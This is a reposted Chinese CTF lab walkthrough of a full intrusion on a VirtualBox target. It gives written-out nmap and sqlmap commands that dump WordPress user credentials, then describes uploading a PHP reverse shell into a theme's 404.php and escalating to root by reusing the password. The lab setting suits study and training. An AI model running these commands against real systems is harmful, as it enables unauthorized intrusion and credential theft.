标签:sqlmap 登录 -- 192.168 漏洞 CTF SQL 网站 POST
实验环境:
攻击者:Kali Linux(192.168.0.10)
靶机:Oracle VM VirtualBox 6.1.10——Ubuntu(32-bit)(192.168.0.250)
实验流程:
- 信息探测
检测与靶机的网络连通性
端口扫描,服务探测
详细信息扫描
命令:nmap -A -v -T4 192.168.0.250
对80端口的web服务进行目录扫描
通过目录扫描发现一个phpmyadmin和登录页面login.php
登录页面没有验证码和防爆破机制,可以进行暴力破解。登录页面也可能存在SQL注入漏洞
对8080端口对应的web网站进行目录扫描,该网站使用WordPress作为建站系统
对于使用了建站系统的网站,可以利用其公开漏洞getshell,但大多数能够getshell的漏洞基本都属于后台漏洞。可以探测网站中是否存在SQL注入漏洞,利用SQL注入漏洞获取网站后台登录密码,利用WordPress的公开漏洞getshell。 - 对登录页面(http://192.168.0.250/login.php)进行SQL注入测试
工具:sqlmap
利用BP获取登录页面对应的请求消息
对浏览器设置代理服务器:127.0.0.1:8080
打开Bp,开启流量监听功能
随意输入用户名和密码,点击登录/提交,发送请求
获取请求流量
将请求消息写入到一个文件并且复制到kali,利用sqlmap进行检测
命令:sqlmap -r request.txt --level 5 --risk 3 --dbms mysql --batch –dbs
结果分析:请求数据中的user字段可能存在注入点,类型为字符型,POST请求方式,注入手法为延时注入。获取到的数据库名如下
结果分析:其中WordPress8080可能为8080端口对应的网站的后台数据库,尝试获取其中的数据表。
命令:sqlmap -r request.txt --level 5 --risk 3 --dbms mysql --batch -D wordpress8080 –tables
结果分析:其中有一个表名users,极有可能存储了网站后台用户的账号密码。获取该表中的字段。
命令:sqlmap -r request.txt --level 5 --risk 3 --dbms mysql --batch -D wordpress8080 -T users –columns
获取数据表中的数据
命令:sqlmap -r request.txt --level 5 --risk 3 --dbms mysql --batch -D wordpress8080 -T users -C username,password --dump
使用该用户名和密码登录网站后台
登录成功
- 漏洞利用
在kali中获取反弹shell的PHP脚本
修改接收shell的IP地址和端口号
kali监听端口
上传木马
访问该404页面,
http://192.168.0.250:8080/wordpress/wp-content/themes/twentythirteen/404.php
注意网站的IP地址和主题数字,访问成功后即反弹回shell
- 权限提升
查看当前权限,程序用户
优化shell
尝试切换为root用户,使用网站后台登录密码进行登录
提权成功
标签:sqlmap,登录,--,192.168,漏洞,CTF,SQL,网站,POST 来源: https://blog.csdn.net/su__xiaoyan/article/details/111588282
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。